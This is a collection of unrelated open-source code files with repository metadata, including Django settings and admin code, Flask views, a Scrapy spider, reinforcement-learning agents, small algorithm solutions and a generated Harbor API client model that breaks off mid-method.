if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
4016835924c889c2ef390dd8f82ba30088442636
|
0cd799684098c374ec6d0806410f2077814b2e9e
|
/advisor/migrations/0002_booking.py
|
7e9a8232b8d404a10fdf566e1ecff43de219c083
|
[
"MIT"
] |
permissive
|
diyajaiswal11/User_Advisor
|
bc2e6828f899e08dcf3a1ef0fbe041a8013c43b4
|
332001e874add115b19cccd2fb0b6622321f32c2
|
refs/heads/main
| 2023-04-17T07:48:24.801798
| 2021-04-25T11:25:30
| 2021-04-25T11:25:30
| 361,345,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 894
|
py
|
# Generated by Django 3.2 on 2021-04-25 09:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('advisor', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('booking_time', models.DateTimeField()),
('advisor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='advisor.advisor')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='booking', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"shubhijaiswal2000@gmail.com"
] |
shubhijaiswal2000@gmail.com
|
23495c8203860fae627a8100b1b8e2e9ba365996
|
e58b3b41505eea2848624c69282327b8531c5a9d
|
/apps/operations/adminx.py
|
10c0907278f8e6753f7998be043e6b8374d71df9
|
[] |
no_license
|
GoYMS/mxonline
|
9d4a9624921a389308896ddba9a817282e910532
|
3b9e27aaaf8f47a89083806cb8f885a5b8c31c36
|
refs/heads/master
| 2022-12-13T11:50:24.218015
| 2020-02-21T07:25:34
| 2020-02-21T07:25:34
| 242,054,819
| 1
| 0
| null | 2022-12-08T06:19:00
| 2020-02-21T04:34:42
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
import xadmin
from apps.operations.models import UserAsk,CourseComments,UserCourse,UserFavorite,UserMessage,Banner
class BannerAdmin(object):
list_display = ['title', 'image', 'url', 'datetime','index']
search_fields = ['title', 'image', 'url','index']
list_filter = ['title', 'image', 'url', 'datetime','index']
class UserAskAdmin(object):
list_display = ['title', 'image', 'url','index']
search_fields = ['title', 'image', 'url','index']
list_filter = ['title', 'image', 'url','index']
class UserCourseAdmin(object):
list_display = ['user', 'course', 'datetime']
search_fields = ['user', 'course']
list_filter = ['user', 'course', 'datetime']
class UserMessageAdmin(object):
list_display = ['user', 'message', 'has_read','datetime']
search_fields = ['user','message', 'has_read']
list_filter = ['user', 'message', 'has_read', 'datetime']
class CourseCommentsAdmin(object):
list_display = ['user', 'course','comments', 'datetime']
search_fields = ['user', 'course','comments']
list_filter = ['user', 'course', 'comments','datetime']
class UserFavoriteAdmin(object):
list_display = ['user', 'fav_id', 'fav_type', 'datetime']
search_fields = ['user', 'fav_id', 'fav_type']
list_filter = ['user', 'fav_id', 'fav_type', 'datetime']
xadmin.site.register(Banner,BannerAdmin)
xadmin.site.register(UserAsk,UserAskAdmin)
xadmin.site.register(UserCourse,UserCourseAdmin)
xadmin.site.register(UserMessage,UserMessageAdmin)
xadmin.site.register(CourseComments,CourseCommentsAdmin)
xadmin.site.register(UserFavorite,UserFavoriteAdmin)
|
[
"1789353033@qq.com"
] |
1789353033@qq.com
|
a8c9f7cf950293dcc4cd6b1a2029129783a07270
|
41bee87d712a9460ab2d79a7439cd9f98e861d63
|
/TgwlDataCenter/TgwlDataCenter/main/views.py
|
a4ea7f9d3fa2fca724acbb0daa9c2a22beb5e1aa
|
[] |
no_license
|
liulixiang1988/iis_flask_demo
|
e72e209281441521b2b952dbf3547a5dc6507ec1
|
f1d77f363b64fc52859c83fbffb6da563df561c4
|
refs/heads/master
| 2021-01-10T08:12:20.164278
| 2015-11-27T01:59:45
| 2015-11-27T01:59:45
| 46,954,319
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 949
|
py
|
# -*- coding:utf-8 -*-
from datetime import datetime
from flask import render_template
from TgwlDataCenter import db
from TgwlDataCenter.models import Fruit
from TgwlDataCenter.main import main
@main.route('/')
@main.route('/home')
def home():
"""Renders the home page."""
fruit = Fruit(fruit=u"苹果")
db.session.add(fruit)
db.session.commit()
return render_template(
'index.html',
title='Home Page',
year=datetime.now().year,
)
@main.route('/contact')
def contact():
"""Renders the contact page."""
return render_template(
'contact.html',
title='Contact',
year=datetime.now().year,
message='Your contact page.'
)
@main.route('/about')
def about():
"""Renders the about page."""
return render_template(
'about.html',
title='About',
year=datetime.now().year,
message='Your application description page.'
)
|
[
"liulixiang1988@gmail.com"
] |
liulixiang1988@gmail.com
|
2c896f2e371789e95671bb85e89272c49208ec25
|
52f00638c8773b001da5a341e16abc05934457f8
|
/rlpyt/agents/pg/mujoco.py
|
0ac8ff5e3dad5ea0dc9f92de401c713934064014
|
[
"MIT"
] |
permissive
|
abagaria/rlpyt
|
8e72dde5f3750c72da1fd8a97badf2c9691ea633
|
9d35217f2ecec60891753cf313d482d7887c16e1
|
refs/heads/master
| 2020-09-04T00:16:35.320779
| 2019-11-21T19:21:49
| 2019-11-21T19:21:49
| 219,614,849
| 0
| 1
|
MIT
| 2019-11-04T23:17:11
| 2019-11-04T23:17:10
| null |
UTF-8
|
Python
| false
| false
| 1,049
|
py
|
from rlpyt.agents.pg.gaussian import (GaussianPgAgent,
RecurrentGaussianPgAgent, AlternatingRecurrentGaussianPgAgent)
from rlpyt.models.pg.mujoco_ff_model import MujocoFfModel
from rlpyt.models.pg.mujoco_lstm_model import MujocoLstmModel
class MujocoMixin:
def make_env_to_model_kwargs(self, env_spaces):
assert len(env_spaces.action.shape) == 1
return dict(observation_shape=env_spaces.observation.shape,
action_size=env_spaces.action.shape[0])
class MujocoFfAgent(MujocoMixin, GaussianPgAgent):
def __init__(self, ModelCls=MujocoFfModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
class MujocoLstmAgent(MujocoMixin, RecurrentGaussianPgAgent):
def __init__(self, ModelCls=MujocoLstmModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
class AlternatingMujocoLstmAgent(MujocoMixin,
AlternatingRecurrentGaussianPgAgent):
def __init__(self, ModelCls=MujocoLstmModel, **kwargs):
super().__init__(ModelCls=ModelCls, **kwargs)
|
[
"adam.stooke@gmail.com"
] |
adam.stooke@gmail.com
|
72dc80d819fcaab11a208c849483dcbb988c9a1f
|
4a31308430d06cc3743e0dcc52501c0addd19008
|
/nodeA/p2p/core_node_list.py
|
a6782b3f7f3b6d28e02543a5bfab7d3c94796956
|
[] |
no_license
|
hyo07/bc2odpt-dev
|
b22ad08139c311164cabce63b547dd076df52c08
|
2f11ae5b4dad410ba66179c7701b2e25ceeff371
|
refs/heads/master
| 2022-12-12T18:16:23.250608
| 2020-11-06T07:23:06
| 2020-11-06T07:23:06
| 247,711,283
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
import threading
class CoreNodeList:
def __init__(self):
self.lock = threading.Lock()
self.list = set()
def add(self, peer):
"""
Add a Core node to the list.
param:
peer : connection info (IP address and port number) of the node to store as a Core node
"""
with self.lock:
print('Adding peer: ', peer)
self.list.add((peer))
print('Current Core List: ', self.list)
def remove(self, peer):
"""
Remove a Core node that appears to have left the network from the list.
param:
peer : connection info (IP address and port number) of the node to remove
"""
with self.lock:
if peer in self.list:
print('Removing peer: ', peer)
self.list.remove(peer)
print('Current Core list: ', self.list)
def overwrite(self, new_list):
"""
Use this when you want to overwrite the whole list at once, for example after checking the liveness of several peers.
"""
with self.lock:
print('core node list will be going to overwrite')
self.list = new_list
print('Current Core list: ', self.list)
def get_list(self):
"""
Return the list of currently connected peers.
"""
li = set(self.list)
return li
def get_length(self):
return len(self.list)
def get_c_node_info(self):
"""
Return the peer at the top of the list.
"""
return list(self.list)[0]
def has_this_peer(self, peer):
"""
Check whether the given peer is contained in the list.
param:
peer : tuple of IP address and port number
return:
True or False
"""
return peer in self.list
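# A minimal usage sketch (the addresses below are illustrative only, not part of the project):
if __name__ == "__main__":
    core_nodes = CoreNodeList()
    core_nodes.add(('192.168.0.10', 50082))
    core_nodes.add(('192.168.0.11', 50082))
    print(core_nodes.get_length())                             # 2
    print(core_nodes.has_this_peer(('192.168.0.10', 50082)))   # True
    core_nodes.remove(('192.168.0.11', 50082))
    print(core_nodes.get_list())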
|
[
"yutaka727kato@gmail.com"
] |
yutaka727kato@gmail.com
|
084e4cf81257ae12d846254bbff0055434fc7d89
|
e97e727972149063b3a1e56b38961d0f2f30ed95
|
/test/test_double_operation_resource.py
|
31eb32a0b4acb0777dcf050bca89159001193ac1
|
[] |
no_license
|
knetikmedia/knetikcloud-python-client
|
f3a485f21c6f3e733a864194c9acf048943dece7
|
834a24415385c906732437970db105e1bc71bde4
|
refs/heads/master
| 2021-01-12T10:23:35.307479
| 2018-03-14T16:04:24
| 2018-03-14T16:04:24
| 76,418,830
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,073
|
py
|
# coding: utf-8
"""
Knetik Platform API Documentation latest
This is the spec for the Knetik API. Use this in conjunction with the documentation found at https://knetikcloud.com.
OpenAPI spec version: latest
Contact: support@knetik.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import knetik_cloud
from knetik_cloud.rest import ApiException
from knetik_cloud.models.double_operation_resource import DoubleOperationResource
class TestDoubleOperationResource(unittest.TestCase):
""" DoubleOperationResource unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testDoubleOperationResource(self):
"""
Test DoubleOperationResource
"""
# FIXME: construct object with mandatory attributes with example values
#model = knetik_cloud.models.double_operation_resource.DoubleOperationResource()
pass
if __name__ == '__main__':
unittest.main()
|
[
"shawn.stout@knetik.com"
] |
shawn.stout@knetik.com
|
c5e3cf8ccaee00baf6e761221f47c8375c551c50
|
35b6013c1943f37d1428afd2663c8aba0a02628d
|
/enterpriseknowledgegraph/search/lookup_sample_test.py
|
14bb48921ebb2818291664e810db90c14a1145eb
|
[
"Apache-2.0"
] |
permissive
|
GoogleCloudPlatform/python-docs-samples
|
d2a251805fbeab15d76ed995cf200727f63f887d
|
44e819e713c3885e38c99c16dc73b7d7478acfe8
|
refs/heads/main
| 2023-08-28T12:52:01.712293
| 2023-08-28T11:18:28
| 2023-08-28T11:18:28
| 35,065,876
| 7,035
| 7,593
|
Apache-2.0
| 2023-09-14T20:20:56
| 2015-05-04T23:26:13
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import lookup_sample
project_id = os.environ["GOOGLE_CLOUD_PROJECT"]
location = "global"
ids = ["c-024dcv3mk"]
languages = ["en"]
def test_lookup(capsys):
lookup_sample.lookup_sample(
project_id=project_id,
location=location,
ids=ids,
languages=languages,
)
out, _ = capsys.readouterr()
assert "Name: Google" in out
assert "Types" in out
assert "Cloud MID" in out
|
[
"noreply@github.com"
] |
GoogleCloudPlatform.noreply@github.com
|
d7c11080139ed0bff1800582fef010d1bedb96c7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_201/1514.py
|
0f27373d40ddcd82cb07423f15c79eea3f3c6422
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
from math import floor, ceil
def get_result(num, k):
if num == k:
return 0, 0
if num == 2:
return 1, 0
if k == 1:
if num % 2 == 0:
return (num / 2), (num / 2) - 1
else:
return (num - 1) / 2, (num - 1) / 2
num_1 = ceil((num - 1) / 2)
num_2 = floor((num - 1) / 2)
if k % 2 == 0:
return get_result(num_1, ceil((k - 1) / 2))
else:
return get_result(num_2, floor((k - 1) / 2))
def solve():
n, k = [int(s) for s in input().split(" ")]
return get_result(n, k)
t = int(input())
for i in range(1, t + 1):
result = solve()
print("Case #{}: {} {}".format(i, int(result[0]), int(result[1])))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
615a7ce2809c9bdded6aa8d12c3fb35fe9b1ec63
|
d094ba0c8a9b1217fbf014aa79a283a49aabe88c
|
/env/share/doc/networkx-2.2/examples/drawing/plot_four_grids.py
|
9123bb27725a34a30be61f73d9402afefc496e05
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
Raniac/NEURO-LEARN
|
d9274e0baadd97bb02da54bdfcf6ca091fc1c703
|
3c3acc55de8ba741e673063378e6cbaf10b64c7a
|
refs/heads/master
| 2022-12-25T23:46:54.922237
| 2020-09-06T03:15:14
| 2020-09-06T03:15:14
| 182,013,100
| 9
| 2
|
Apache-2.0
| 2022-12-09T21:01:00
| 2019-04-18T03:57:00
|
CSS
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
#!/usr/bin/env python
"""
==========
Four Grids
==========
Draw a graph with matplotlib.
You must have matplotlib for this to work.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
# Copyright (C) 2004-2018
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import matplotlib.pyplot as plt
import networkx as nx
G = nx.grid_2d_graph(4, 4) # 4x4 grid
pos = nx.spring_layout(G, iterations=100)
plt.subplot(221)
nx.draw(G, pos, font_size=8)
plt.subplot(222)
nx.draw(G, pos, node_color='k', node_size=0, with_labels=False)
plt.subplot(223)
nx.draw(G, pos, node_color='g', node_size=250, with_labels=False, width=6)
plt.subplot(224)
H = G.to_directed()
nx.draw(H, pos, node_color='b', node_size=20, with_labels=False)
plt.show()
|
[
"leibingye@outlook.com"
] |
leibingye@outlook.com
|
2fcd265f4cfb612be33f39b9c2a640b0e8ebb430
|
fd18ce27b66746f932a65488aad04494202e2e0d
|
/d11_spider/codes/Adv_Spider/Adv_Spider/spiders/baidu_request.py
|
2700834d6cf9b738aef84a4995acbedad18f4c50
|
[] |
no_license
|
daofeng123/ClassCodes
|
1acbd843836e550c9cebf67ef21dfca9f6b9fc87
|
fbcd1f24d79b8bb56ad0669b07ad118064609612
|
refs/heads/master
| 2020-06-24T12:34:28.148197
| 2019-08-15T03:56:40
| 2019-08-15T03:56:40
| 198,963,469
| 3
| 0
| null | 2019-07-26T06:53:45
| 2019-07-26T06:53:44
| null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
# -*- coding: utf-8 -*-
import json
import scrapy
import scrapy.http
class BaiduRequestSpider(scrapy.Spider):
name = 'baidu_request'
allowed_domains = ['fanyi.baidu.com']
start_urls = ['https://fanyi.baidu.com/sug']
def start_requests(self):
# Request
headers = {
'content-type': 'application/x-www-form-urlencoded',
}
trnaslator_1 = scrapy.Request(
url=self.start_urls[0],
callback=self.get_translate,
method='POST', # the official docs call for uppercase, but in practice either case works
headers=headers, # --> specify the form content type
dont_filter=True, # same request URL; keep it from being filtered as a duplicate
body='kw=test'.encode()) # when submitting via the raw body, the form content type must be set by hand
# FormRequest
form = {
'kw': 'test'
}
trnaslator_2 = scrapy.FormRequest(
url=self.start_urls[0],
callback=self.get_translate,
dont_filter=True,
formdata=form) # form-style submission; the form encoding is handled automatically
return [trnaslator_1, trnaslator_2]
def get_translate(self, response):
print('--------------------')
result = json.loads(response.text)
print(result)
|
[
"38395870@qq.com"
] |
38395870@qq.com
|
703e62e2db63fdf7b1f11b8d7276719c0d544cd9
|
3f9e960174cfc5c8bd6827ce5362124c467a3952
|
/python/data_structure/api_fields_values_histogram.py
|
09fed45101551344fdd765d4719736c3bf9bb234
|
[] |
no_license
|
monobinab/python
|
f3ec6d462d7149c007ac9e14e72132eae73b4acd
|
265621b045969c819eb86fa7ba2a3bdfad34ecb6
|
refs/heads/master
| 2020-12-03T00:04:29.185880
| 2017-07-01T18:53:11
| 2017-07-01T20:06:16
| 95,982,002
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
#!/usr/bin/env python
# This script parses storm log files and creates pipe-delimited storm log files.
import sys
from datetime import date, timedelta, datetime
#from dateutil import parser
counts = dict()
tmp_lst = list()
# input comes from STDIN (standard input)
for line in sys.stdin:
client = ""
try:
if line is not None and "api: response" in line:
fields = line.split("|")
client = fields[3].strip()
counts[client] = counts.get(client, 0) + 1
except:
continue;
#print('%s' % (counts))
for key, val in counts.items():
tmp_lst.append((key, val))
for k,v in tmp_lst:
outline = str(k) + "|" + str(v)
print('%s' % (outline))
#print('%s' % (outline))
#outline = counts
|
[
"monobina.saha@searshc.com"
] |
monobina.saha@searshc.com
|
7bd38216ab778e3afaf00fe52d4e142572267d0c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03862/s008273879.py
|
920a1b732a14199ec1f52a59849810aee0710dc2
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
py
|
n, x = map(int, input().split())
A = list(map(int, input().split()))
ans = 0
for i in range(n - 1):
if A[i] + A[i + 1] > x:
ans += A[i] + A[i + 1] - x
A[i + 1] = max(x - A[i], 0)
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
246f7e3ba7f6dd25ba307531bd7af5a603be58c7
|
802c002ecd90be6b489e0250ec4454a11c17ed1d
|
/src/homework/homework13/main_homework7.py
|
301a2f393bbefdf4b2ea9b60e17fa62bb2949b97
|
[
"MIT"
] |
permissive
|
acc-cosc-1336/cosc-1336-spring-2018-EricScotty
|
3a088285ae853a9ff5d747f2301f755c5e3749b3
|
80c0249a583dc178cfc7bb95b851d7f3240dc3e9
|
refs/heads/master
| 2021-09-14T05:54:02.132705
| 2018-05-08T23:27:04
| 2018-05-08T23:27:04
| 118,071,042
| 0
| 0
|
MIT
| 2018-04-23T02:51:05
| 2018-01-19T03:22:13
|
Python
|
UTF-8
|
Python
| false
| false
| 969
|
py
|
from src.homework.homework7 import get_p_distance_matrix, print_get_p_distance_matrix
'''
Write a main function to...
Read p_distance.dat file
From the file data, create a two-dimensional list like the following example:
[
['T','T','T','C','C','A','T','T','T','A'],
['G','A','T','T','C','A','T','T','T','C'],
['T','T','T','C','C','A','T','T','T','T'],
['G','T','T','C','C','A','T','T','T','A']
]
Pass the list to the get_p_distance_matrix function as an argument
Display the p distance matrix to screen
'''
def main():
matrix = []
file_object = open('p_distance.dat', 'r')
content = file_object.readlines()
for line in content[:]:
line = line.rstrip('\n').replace(" ", "")
matrix_line = []
for letter in line:
matrix_line.append(letter)
matrix.append(matrix_line)
results_mtrx = get_p_distance_matrix(matrix)
print_get_p_distance_matrix(results_mtrx)
main()
|
[
"noreply@github.com"
] |
acc-cosc-1336.noreply@github.com
|
1dbb1088e45851aaa83d57c2a6646e4158d3da5a
|
d746f9f262961fd4c65eb332d8325f7fdacf3757
|
/dingureu/settings.py
|
f9c67e688925e9835faf2ffc1592a29418a4d0d6
|
[] |
no_license
|
Ganodab-Brothers/dingureu-django-backend
|
c69c84e48c64874bb283fec07dee2c203fca6b08
|
2aa37bbdd5c8b003b0e73854c2eca23a3deccb06
|
refs/heads/master
| 2023-04-20T21:10:26.686591
| 2021-04-28T00:33:39
| 2021-04-28T00:33:39
| 359,873,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,866
|
py
|
"""
Django settings for dingureu project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
from config import envs
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = envs.SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = envs.DEBUG == 'true'
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'drf_yasg',
'user',
'file',
'article',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dingureu.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dingureu.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'HOST': envs.DB_HOST,
'PORT': envs.DB_PORT,
'USER': envs.DB_USER,
'PASSWORD': envs.DB_PASSWORD,
'NAME': envs.DB_NAME,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME':
'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
AUTH_USER_MODEL = 'user.User'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES':
('rest_framework_simplejwt.authentication.JWTAuthentication', )
}
SWAGGER_SETTINGS = {
'SECURITY_DEFINITIONS': {
'Bearer': {
'type': 'apiKey',
'name': 'Authorization',
'in': 'header',
}
},
'USE_SESSION_AUTH': False,
}
|
[
"code.yeon.gyu@gmail.com"
] |
code.yeon.gyu@gmail.com
|
651237ce3104a4d44722f7c75a12ee6769a94487
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03937/s470682175.py
|
1480749348da6cfb1296018b442d2120f2ab5b1e
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
H,W=map(int,input().split())
field=[]
for i in range(H):
s=input()
a=[]
for j in range(W):
a.append(s[j])
field.append(a)
def dfs(x,y):
field[x][y]='.'
dx=[0,1]
dy=[1,0]
for i in range(2):
nx=x+dx[i]
ny=y+dy[i]
if 0<=nx and nx<H and 0<=ny and ny<W and field[nx][ny]=="#":
dfs(nx,ny)
break
return
dfs(0,0)
for i in range(H):
for j in range(W):
if field[i][j]=='#':
print('Impossible')
exit()
print('Possible')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1d6b97e765f3a7f16caed9f39bd488474adf650e
|
b0dbd2e4dd83fe012cde29c8474bae5e33c23e2a
|
/harbor_client/model/robot_create_v1.py
|
2f99d134e25272b617002f74eb94bb0b6fce1cd4
|
[] |
no_license
|
DevotionZhu/harbor-python-client-api
|
0ba3999e5af126dbe97f0234c4a9601660a97dbb
|
f0cc6c453b488d5f456eff94000156182eb3a468
|
refs/heads/master
| 2023-04-17T22:06:06.024871
| 2021-04-11T22:20:28
| 2021-04-11T22:20:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,200
|
py
|
"""
Harbor API
These APIs provide services for manipulating Harbor project. # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from harbor_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from harbor_client.model.access import Access
globals()['Access'] = Access
class RobotCreateV1(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'name': (str,), # noqa: E501
'description': (str,), # noqa: E501
'expires_at': (int,), # noqa: E501
'access': ([Access],), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'name': 'name', # noqa: E501
'description': 'description', # noqa: E501
'expires_at': 'expires_at', # noqa: E501
'access': 'access', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""RobotCreateV1 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
name (str): The name of robot account. [optional] # noqa: E501
description (str): The description of robot account. [optional] # noqa: E501
expires_at (int): The expiration time on or after which the JWT MUST NOT be accepted for processing.. [optional] # noqa: E501
access ([Access]): The permission of robot account. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
